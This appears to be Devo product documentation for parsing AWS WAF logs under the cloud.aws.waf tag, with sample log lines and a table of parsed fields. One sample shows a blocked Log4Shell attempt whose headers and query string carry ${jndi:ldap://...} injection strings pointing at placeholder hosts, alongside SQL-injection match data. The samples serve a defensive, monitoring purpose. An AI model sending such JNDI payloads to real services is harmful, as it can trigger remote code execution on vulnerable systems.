cloud.aws.waf

Introduction

The tags beginning with cloud.aws.waf identify events generated by the Amazon AWS WAF service.

Valid tags and data tables

The full tag can have 4 to 6 levels. The first two are fixed as cloud.aws. The third level identifies the type of events sent, and the fourth, fifth and sixth levels indicate the event subtype.

Technology	Brand	Type	Subtype 1	Subtype 2	Subtype 3
cloud	aws	waf	logs	<accountId>	<region>

These are the valid tags and corresponding data tables that will receive the parsers' data:

Tag	Data table
cloud.aws.waf.logs.<accountId>.<region>	cloud.aws.waf.logs

How is the data sent to Devo?

Logs generated by AWS WAF service can be sent to AWS CloudWatch Logs, S3, and Kinesis Data Firehose services.

The preferred methods are using the first two services as destinations. In these cases, Devo AWS collector can be used for gathering, properly tagging, and securely forwarding these logs to Devo.

Logs sent to Kinesis Data Firehose can be properly tagged using an AWS Lambda function and forwarded to a Devo HTTP(s) endpoint (as an alternative, a Devo Relay deployed in an EC2 instance can be used for tagging and securely forwarding events using Syslog protocol).

Log samples

The following are sample logs sent to each of the cloud.aws data tables. Also, find how the information will be parsed in your data table under each sample log.

Extra columns

Fields marked as Extra in the table below are not shown by default in data tables and need to be explicitly requested in the query. You can find them marked as Extra when you perform a query so they can be easily identified. Learn more about this in Selecting unrevealed columns.

cloud.aws.waf.logs.a.b

2021-12-29 10:38:58.309 localhost=127.0.0.1 cloud.aws.waf.logs.a.b: {"timestamp": 1533689070589, "formatVersion": 24376, "webaclId": "5d3a0adeee61858270fa84872b5977c42a7a0d", "terminatingRuleId": "52dcc9331ed1b33d", "terminatingRuleType": "4354445e0", "action": "9b75f21", "httpSourceName": "5544", "httpSourceId": "91107a8", "ruleGroupList": [{"ruleGroupId": "8d2527566419d3b0b3df3467f7fee63b73e9d5", "terminatingRule": null, "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "7aeff8bb60cb037f4a6b6b985d34e125931c4c"}], "excludedRules": [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]}], "rateBasedRuleList": [{"rateBasedRuleId": "b04caf3737843bcdcce00c5b88d21879dce251", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a7540377b76d2f24773a2a62665702e3bb", "limitKey": "7e01", "maxRateAllowed": 14171}], "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "450eac3b8deb833645fb20dc4480d14cedd214"}], "httpRequest": {"clientIp": "31957ab1ae7f55", "country": "c285", "headers": [{"name": "f2e782", "value": "6b8868d4f674fc0c"}, {"name": "931caa3e8553", "value": "866864a87b4ba"}, {"name": "1aab2862", "value": "28c25"}], "uri": "e3f3cf5928", "args": "bba95d7174dd4", "httpVersion": "6ca115b920", "httpMethod": "a4c51", "requestId": "02fbbed2d9f72a0bb671ff69"}}
2021-12-29 10:38:58.731 localhost=127.0.0.1 cloud.aws.waf.logs.a.b: {"timestamp": 1640137470799, "formatVersion": 1, "webaclId": "arn:aws:test", "terminatingRuleId": "AWSManagedRulesKnownBadInputsRuleSet", "terminatingRuleType": "MANAGED_RULE_GROUP", "action": "BLOCK", "terminatingRuleMatchDetails": [{"conditionType": "test1", "location": "tucasa", "matchedData": ["data1", "data2"]}], "httpSourceName": "ALB", "httpSourceId": "testid", "ruleGroupList": [{"ruleGroupId": "AWS#AWSManagedRulesKnownBadInputsRuleSet", "terminatingRule": {"ruleId": "Log4JRCE", "action": "BLOCK", "ruleMatchDetails": {"conditionType": "SQL_INJECTION", "location": "HEADER", "matchedData": ["10", "and", "1"]}}, "nonTerminatingMatchingRules": [{"ruleId": "RuleB-SQLi", "action": "COUNT", "ruleMatchDetails": [{"conditionType": "SQL_INJECTION", "location": "HEADER", "matchedData": ["10", "and", "1"]}]}], "excludedRules": [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]}], "rateBasedRuleList": [{"rateBasedRuleId": "b04caf3737843bcdcce00c5b88d21879dce251", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a7540377b76d2f24773a2a62665702e3bb", "limitKey": "7e01", "maxRateAllowed": 14171}], "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "450eac3b8deb833645fb20dc4480d14cedd214"}], "requestHeadersInserted": [{"name": "x-amzn-waf-test-header-name", "value": "test-header-value"}], "responseCodeSent": 1234, "httpRequest": {"clientIp": "0.0.0.0", "country": "AU", "headers": [{"name": "Host", "value": "laptop-88.mydomain.org"}, {"name": "User-Agent", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "Connection", "value": "close"}, {"name": "X-Apple-Request-Uuid", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "X-Forwarded-For", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "X-Forwarded-Host", "value": "${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4#$human.mydomain.net:443}"}, {"name": "Accept-Encoding", "value": "gzip"}], "uri": "/", "args": "test=${jndi:ldap://var/temp/water/goal/however/tree/individual.mp4", "httpVersion": "HTTP/1.1", "httpMethod": "GET", "requestId": "1-61c282fe-064defd64aab2d3065f7f540"}, "labels": [{"name": "awswaf:managed:aws:known-bad-inputs:Log4JRCE"}]}

And this is how the log would be parsed:

Field	Value	Type	Field transformation	Source field name	Extra fields
httpRequest_requestId	`02fbbed2d9f72a0bb671ff69`	`str`
webaclId	`5d3a0adeee61858270fa84872b5977c42a7a0d`	`str`
nonTerminatingMatchingRules_action_str	`6af7476`	`str`	join(nonTerminatingMatchingRules_action, ',')	nonTerminatingMatchingRules_action
httpRequest_headers_value_str	`6b8868d4f674fc0c,866864a87b4ba,28c25`	`str`	join(httpRequest_headers_value, ',')	httpRequest_headers_value
httpRequest_httpVersion	`6ca115b920`	`str`
ruleGroupList_ruleGroupId_str	`8d2527566419d3b0b3df3467f7fee63b73e9d5`	`str`	join(ruleGroupList_ruleGroupId, ',')	ruleGroupList_ruleGroupId
action	`9b75f21`	`str`
terminatingRuleId	`52dcc9331ed1b33d`	`str`
rateBasedRuleList_limitKey_str	`7e01,7e01`	`str`	join(rateBasedRuleList_limitKey, ',')	rateBasedRuleList_limitKey
nonTerminatingMatchingRules_ruleId_str	`450eac3b8deb833645fb20dc4480d14cedd214`	`str`	join(nonTerminatingMatchingRules_ruleId, ',')	nonTerminatingMatchingRules_ruleId
timestamp	`2018-08-08 00:44:30.589`	`timestamp`
eventdate	`2021-12-29 10:38:58.309`	`timestamp`
httpRequest_clientIp	`31957ab1ae7f55`	`str`
httpSourceId	`91107a8`	`str`
terminatingRuleType	`4354445e0`	`str`
httpSourceName	`5544`	`str`
formatVersion	`24376`	`int4`
ACCID	`a`	`str`
REGION	`b`	`str`
httpRequest_country	`c285`	`str`
httpRequest_httpMethod	`a4c51`	`str`
terminatingRuleMatchDetails_conditionType_str	`null`	`str`	join(terminatingRuleMatchDetails_conditionType, ',')	terminatingRuleMatchDetails_conditionType
terminatingRuleMatchDetails_location_str	`null`	`str`	join(terminatingRuleMatchDetails_location, ',')	terminatingRuleMatchDetails_location
terminatingRuleMatchDetails_matchedData_str	`null`	`str`	join(terminatingRuleMatchDetails_matchedData, ',')	terminatingRuleMatchDetails_matchedData
requestHeadersInserted_name_str	`null`	`str`	join(requestHeadersInserted_name, ',')	requestHeadersInserted_name
requestHeadersInserted_value_str	`null`	`str`	join(requestHeadersInserted_value, ',')	requestHeadersInserted_value
responseCodeSent	`null`	`int4`
labels_name_str	`null`	`str`	join(labels_name, ',')	labels_name
httpRequest_uri	`e3f3cf5928`	`str`
rateBasedRuleList_maxRateAllowed_str	`[14171,14171]`	`str`	stringify(json(rateBasedRuleList_maxRateAllowed))	rateBasedRuleList_maxRateAllowed
httpRequest_args	`bba95d7174dd4`	`str`
hostname	`localhost`	`str`
hostchain	`localhost=127.0.0.1`	`str`			✓
httpRequest_headers_name_str	`f2e782,931caa3e8553,1aab2862`	`str`	join(httpRequest_headers_name, ',')	httpRequest_headers_name
tag	`cloud.aws.waf.logs.a.b`	`str`			✓
rateBasedRuleList_rateBasedRuleId_str	`b04caf3737843bcdcce00c5b88d21879dce251,851a7540377b76d2f24773a2a62665702e3bb`	`str`	join(rateBasedRuleList_rateBasedRuleId, ',')	rateBasedRuleList_rateBasedRuleId
ruleGroupList_nonTerminatingMatchingRules_str	`[{"action": "6af7476", "ruleId": "7aeff8bb60cb037f4a6b6b985d34e125931c4c"}]`	`str`	join(ruleGroupList_nonTerminatingMatchingRules, ',')	ruleGroupList_nonTerminatingMatchingRules
ruleGroupList_excludedRules_str	`[{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]`	`str`	join(ruleGroupList_excludedRules, ',')	ruleGroupList_excludedRules
rawMessage	{"timestamp": 1533689070589, "formatVersion": 24376, "webaclId": "5d3a0adeee61858270fa84872b5977c42a7a0d", "terminatingRuleId": "52dcc9331ed1b33d", "terminatingRuleType": "4354445e0", "action": "9b75f21", "httpSourceName": "5544", "httpSourceId": "91107a8", "ruleGroupList": [{"ruleGroupId": "8d2527566419d3b0b3df3467f7fee63b73e9d5", "terminatingRule": null, "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "7aeff8bb60cb037f4a6b6b985d34e125931c4c"}], "excludedRules": [{"exclusionType": "e5511929a2764e53c14", "ruleId": "6efa3dc41088be5b39b98c5ec4a978607b9943"}]}], "rateBasedRuleList": [{"rateBasedRuleId": "b04caf3737843bcdcce00c5b88d21879dce251", "limitKey": "7e01", "maxRateAllowed": 14171}, {"rateBasedRuleId": "851a7540377b76d2f24773a2a62665702e3bb", "limitKey": "7e01", "maxRateAllowed": 14171}], "nonTerminatingMatchingRules": [{"action": "6af7476", "ruleId": "450eac3b8deb833645fb20dc4480d14cedd214"}], "httpRequest": {"clientIp": "31957ab1ae7f55", "country": "c285", "headers": [{"name": "f2e782", "value": "6b8868d4f674fc0c"}, {"name": "931caa3e8553", "value": "866864a87b4ba"}, {"name": "1aab2862", "value": "28c25"}], "uri": "e3f3cf5928", "args": "bba95d7174dd4", "httpVersion": "6ca115b920", "httpMethod": "a4c51", "requestId": "02fbbed2d9f72a0bb671ff69"}}	`str`